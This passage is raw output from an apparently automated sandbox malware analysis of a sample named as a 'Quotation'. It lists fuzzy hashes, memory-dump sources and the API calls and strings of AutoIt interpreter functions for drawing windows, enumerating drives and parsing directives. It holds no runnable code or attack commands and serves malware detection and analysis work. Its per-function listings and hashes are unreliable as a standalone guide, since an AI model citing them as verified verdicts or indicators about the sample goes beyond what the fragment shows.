Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: fdb1ff9fe28f68bc1c9be6beba9b0c0ef4a20534dce1e314201671d140ce5962
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: BE41A4B1D1051CEBCF48CFADC991AAEBBF1EF88201F548299D516AB345D730AB41DB50

Function 00873520 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 77f921b91c3ea006806ec295023316b065a1abe630ed36c636ff4e17c335e675
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: AA018078A00109EFCB44DF98C5909AEF7B5FB48310F208699E809A7705D730EF41DB81

Function 008734C0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 0c9c2bcca07ac3e0fc1d51972a77efa8fa8b4a9e5cc4468817b64b77a41430b4
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: B5019278A00109EFCB58DF98C5909AEF7B5FB48310F208599E819E7705D731EE41EB81

Function 00871E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00987B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00987B70
DeleteObject.GDI32(00000000), ref: 00987B82
DestroyWindow.USER32 ref: 00987B90
GetDesktopWindow.USER32 ref: 00987BAA
GetWindowRect.USER32(00000000), ref: 00987BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00987CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00987D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987D4A
GetClientRect.USER32(00000000,?), ref: 00987D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00987D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987DF8
GlobalFree.KERNEL32(00000000), ref: 00987E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009A2CAC,00000000), ref: 00987E2B
GlobalFree.KERNEL32(00000000), ref: 00987E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00987E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00987E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00987EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098808F

Strings

, xrefs: 00988015
static, xrefs: 00987D8A, 00987EE1
AutoIt v3, xrefs: 00987D42
DISPLAY, xrefs: 00987EF2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a3fd195a3c95877cc9eeeca6a2af4beb25b0b5f9316dec0f378eeaf86f38bc68
Instruction ID: 2f3f0900a39af19bd74362ee7a05d650a92bf1cc7f9b0c749bca5c04904d10d3
Opcode Fuzzy Hash: a3fd195a3c95877cc9eeeca6a2af4beb25b0b5f9316dec0f378eeaf86f38bc68
Instruction Fuzzy Hash: 87027D71A14109AFDB14DFA8CC99EAEBBB9EB48310F148559F915EB3A1CB30DD40DB60

Function 009937F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0099F910), ref: 009938AF
IsWindowVisible.USER32(?), ref: 009938D3

Strings

SELECTSTRING, xrefs: 00993A8E
TABLEFT, xrefs: 0099390F
CHECK, xrefs: 00993AF5
ISCHECKED, xrefs: 00993AC1
GETLINECOUNT, xrefs: 00993B4E
GETCURRENTLINE, xrefs: 00993B75
ADDSTRING, xrefs: 0099399E
GETLINE, xrefs: 00993C23
SENDCOMMANDID, xrefs: 00993C62
TABRIGHT, xrefs: 00993925
CURRENTTAB, xrefs: 00993945
ISVISIBLE, xrefs: 009938BF
SHOWDROPDOWN, xrefs: 00993968
GETSELECTED, xrefs: 00993B2B
DELSTRING, xrefs: 009939D1
HIDEDROPDOWN, xrefs: 00993988
EDITPASTE, xrefs: 00993BE7
ISENABLED, xrefs: 009938F3
GETCURRENTCOL, xrefs: 00993BB0
FINDSTRING, xrefs: 009939FE
SETCURRENTSELECTION, xrefs: 00993A3E
GETCURRENTSELECTION, xrefs: 00993A6B
UNCHECK, xrefs: 00993B0B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: e6cc005df75d8ac6ed57d0f99cf0ad7e5838cc7934716969c3ad0d2a952eaf53
Instruction ID: f3afed7e8cb9d68e677fb4cd9841177b40a1b18c128013cb7e47d2f0a8f7a433
Opcode Fuzzy Hash: e6cc005df75d8ac6ed57d0f99cf0ad7e5838cc7934716969c3ad0d2a952eaf53
Instruction Fuzzy Hash: C8D13E306047059BCF14EF18C461B6AB7E9AFD5344F14885CF8965B2E2DB35EE4ACB82

Function 0099A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0099A89F
GetSysColorBrush.USER32(0000000F), ref: 0099A8D0
GetSysColor.USER32(0000000F), ref: 0099A8DC
SetBkColor.GDI32(?,000000FF), ref: 0099A8F6
SelectObject.GDI32(?,?), ref: 0099A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0099A930
GetSysColor.USER32(00000010), ref: 0099A938
CreateSolidBrush.GDI32(00000000), ref: 0099A93F
FrameRect.USER32(?,?,00000000), ref: 0099A94E
DeleteObject.GDI32(00000000), ref: 0099A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0099A9A0
FillRect.USER32(?,?,?), ref: 0099A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0099A9FD

Part of subcall function 0099AB60: GetSysColor.USER32(00000012), ref: 0099AB99
Part of subcall function 0099AB60: SetTextColor.GDI32(?,?), ref: 0099AB9D
Part of subcall function 0099AB60: GetSysColorBrush.USER32(0000000F), ref: 0099ABB3
Part of subcall function 0099AB60: GetSysColor.USER32(0000000F), ref: 0099ABBE
Part of subcall function 0099AB60: GetSysColor.USER32(00000011), ref: 0099ABDB
Part of subcall function 0099AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0099ABE9
Part of subcall function 0099AB60: SelectObject.GDI32(?,00000000), ref: 0099ABFA
Part of subcall function 0099AB60: SetBkColor.GDI32(?,00000000), ref: 0099AC03
Part of subcall function 0099AB60: SelectObject.GDI32(?,?), ref: 0099AC10
Part of subcall function 0099AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0099AC2F
Part of subcall function 0099AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0099AC46
Part of subcall function 0099AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0099AC5B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 9e6fd970494633cf79f1c9e253087b41730873eb49334ccc684467fb7dbd7c06
Instruction ID: 182b72db3e0c51e61a1863acdc80c4ca9a7174ec300dc4b0f40c71bd5dbf276c
Opcode Fuzzy Hash: 9e6fd970494633cf79f1c9e253087b41730873eb49334ccc684467fb7dbd7c06
Instruction Fuzzy Hash: 95A1727101C301EFDB109F68DC08A6BBBA9FF89321F104A2AF962D61A1D775D944DB92

Function 00912C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00912CA2
DeleteObject.GDI32(00000000), ref: 00912CE8
DeleteObject.GDI32(00000000), ref: 00912CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00912CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00912D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0094C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0094C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0094CAED

Part of subcall function 00911B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00912036,?,00000000,?,?,?,?,009116CB,00000000,?), ref: 00911B9A

SendMessageW.USER32(?,00001053), ref: 0094CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0094CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0094CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0094CB62

Strings

0, xrefs: 0094C981

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 5c3f9f6d8ace7b12e863940d04fae3fc5f0f4a696e46dba2fc640d10122a1aa5
Instruction ID: e311e6ec5e287011451cf183999670c12f0975b72452a9273a1eff8668a10341
Opcode Fuzzy Hash: 5c3f9f6d8ace7b12e863940d04fae3fc5f0f4a696e46dba2fc640d10122a1aa5
Instruction Fuzzy Hash: 7A12BC70205205EFDB60DF28C884FA9BBE9FF44300F5445A9F989DB262C731E891DB91

Function 009877BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009877F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009878B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009878EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00987900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00987946
GetClientRect.USER32(00000000,?), ref: 00987952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00987996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009879A5
GetStockObject.GDI32(00000011), ref: 009879B5
SelectObject.GDI32(00000000,00000000), ref: 009879B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009879C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009879D2
DeleteDC.GDI32(00000000), ref: 009879DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00987A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00987A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00987A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00987A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00987A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00987AAE
GetStockObject.GDI32(00000011), ref: 00987AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00987AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00987ACE

Strings

msctls_progress32, xrefs: 00987A4F
static, xrefs: 00987990, 00987AA8
AutoIt v3, xrefs: 0098793E
DISPLAY, xrefs: 0098799B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: aab11c497d3cf1d4ba46bba32cbf491f75fab0ffa042d14931a39506269b6bd5
Instruction ID: e0f2fdd6b0ce4fe7650bc8185e77f2f53d0260b285402bc8976d48df0698249e
Opcode Fuzzy Hash: aab11c497d3cf1d4ba46bba32cbf491f75fab0ffa042d14931a39506269b6bd5
Instruction Fuzzy Hash: B7A18E71A54209BFEB149FA8DC4AFAEBBB9EB45710F104116FA14E72E0C770AD40DB60

Function 0097AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0097AF89
GetDriveTypeW.KERNEL32(?,0099FAC0,?,\\.\,0099F910), ref: 0097B066
SetErrorMode.KERNEL32(00000000,0099FAC0,?,\\.\,0099F910), ref: 0097B1C4

Strings

PhysicalDrive, xrefs: 0097B012
Removable, xrefs: 0097B0B8
Unknown, xrefs: 0097B086, 0097B12A
iSCSI, xrefs: 0097B169
Fixed, xrefs: 0097B0AE
RAMDisk, xrefs: 0097B090
USB, xrefs: 0097B15B
MMC, xrefs: 0097B185
\\.\, xrefs: 0097AFDB
Fibre, xrefs: 0097B154
Virtual, xrefs: 0097B18C
1394, xrefs: 0097B146
SCSI, xrefs: 0097B131
SSD, xrefs: 0097B0F1
RAID, xrefs: 0097B162
SAS, xrefs: 0097B170
SATA, xrefs: 0097B177
SSA, xrefs: 0097B14D
ATAPI, xrefs: 0097B138
ATA, xrefs: 0097B13F
FileBackedVirtual, xrefs: 0097B193
CDROM, xrefs: 0097B09A
Network, xrefs: 0097B0A4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 6656b6a94203b6802e56c329b058c892197a7ababd414d27d15b7f753bf33f81
Instruction ID: 71a3c162783507eb78219308e7b480a0aa040c276dd3c00f4e518142c9c6f7a3
Opcode Fuzzy Hash: 6656b6a94203b6802e56c329b058c892197a7ababd414d27d15b7f753bf33f81
Instruction Fuzzy Hash: 8151C272F8834DAB8B00DB14C9A6FBDB3B4BB94349760C41AE40EA7691D7399D41DB43

Function 00916A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00916A91
__wcsnicmp.LIBCMT ref: 00916AA9
__wcsnicmp.LIBCMT ref: 00916AC1
__wcsnicmp.LIBCMT ref: 00916AD9
__wcsnicmp.LIBCMT ref: 00916AF1
__wcsnicmp.LIBCMT ref: 00916B09
__wcsnicmp.LIBCMT ref: 00916B21
__wcsnicmp.LIBCMT ref: 00916B35
__wcsnicmp.LIBCMT ref: 00916B76
__wcsnicmp.LIBCMT ref: 00916B8A
__wcsnicmp.LIBCMT ref: 00916B9E
__wcsnicmp.LIBCMT ref: 00916BB2

Strings

#pragma compile, xrefs: 00916A8B
#OnAutoItStartRegister, xrefs: 00916AD3
#include-once, xrefs: 00916AEB
#comments-start, xrefs: 00916B1B, 00916B70
#comments-end, xrefs: 00916B98
Bad directive syntax error, xrefs: 0094E743
#requireadmin, xrefs: 00916ABB
#ce, xrefs: 00916BAC
#notrayicon, xrefs: 00916AA3
Unterminated group of comments, xrefs: 0094E82C
#cs, xrefs: 00916B2F, 00916B84
Cannot parse #include, xrefs: 0094E819
#include, xrefs: 00916B03

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: ee1b5b29e8f2afa2ed863a2268e3f21fb72bf016fc948715f0e0282b3c88783a
Instruction ID: 44d3767deb473dda41838c51a49999abd588f093668102adb4fd82fadcd626fb
Opcode Fuzzy Hash: ee1b5b29e8f2afa2ed863a2268e3f21fb72bf016fc948715f0e0282b3c88783a
Instruction Fuzzy Hash: D7812D71B44209BBCB21AF64CC92FFE776CBF55314F048025FD45E6181EB60DA81C691

Function 0099AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0099AB99
SetTextColor.GDI32(?,?), ref: 0099AB9D
GetSysColorBrush.USER32(0000000F), ref: 0099ABB3
GetSysColor.USER32(0000000F), ref: 0099ABBE
CreateSolidBrush.GDI32(?), ref: 0099ABC3
GetSysColor.USER32(00000011), ref: 0099ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0099ABE9
SelectObject.GDI32(?,00000000), ref: 0099ABFA
SetBkColor.GDI32(?,00000000), ref: 0099AC03
SelectObject.GDI32(?,?), ref: 0099AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0099AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0099AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0099AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0099ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0099ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0099ACEC
DrawFocusRect.USER32(?,?), ref: 0099ACF7
GetSysColor.USER32(00000011), ref: 0099AD05
SetTextColor.GDI32(?,00000000), ref: 0099AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0099AD21
SelectObject.GDI32(?,0099A869), ref: 0099AD38
DeleteObject.GDI32(?), ref: 0099AD43
SelectObject.GDI32(?,?), ref: 0099AD49
DeleteObject.GDI32(?), ref: 0099AD4E
SetTextColor.GDI32(?,?), ref: 0099AD54
SetBkColor.GDI32(?,?), ref: 0099AD5E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 10e7f39489d55cfdf782a2c9f37308a6986024bdc33562ee0be7c9d9ad9d1fe1
Instruction ID: 258bf7ef3e10cd2b2af425f4cb85ef3b28903bd15240c8656360e44c6b04cdfd
Opcode Fuzzy Hash: 10e7f39489d55cfdf782a2c9f37308a6986024bdc33562ee0be7c9d9ad9d1fe1
Instruction Fuzzy Hash: B8615C71904218EFDF119FA8DC48EAEBB79EB08320F218526F915EB2A1D7759D40DB90

Function 00998C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00998D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00998D45
CharNextW.USER32(0000014E), ref: 00998D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00998DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00998DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00998DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00998DF9
SetWindowTextW.USER32(?,0000014E), ref: 00998E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00998E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00998E8C
_memset.LIBCMT ref: 00998EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00998EFA
_memset.LIBCMT ref: 00998F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00998F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00998FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00999088
InvalidateRect.USER32(?,00000000,00000001), ref: 009990AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009990F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00999121
DrawMenuBar.USER32(?), ref: 00999130
SetWindowTextW.USER32(?,0000014E), ref: 00999158

Strings

0, xrefs: 009990C2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

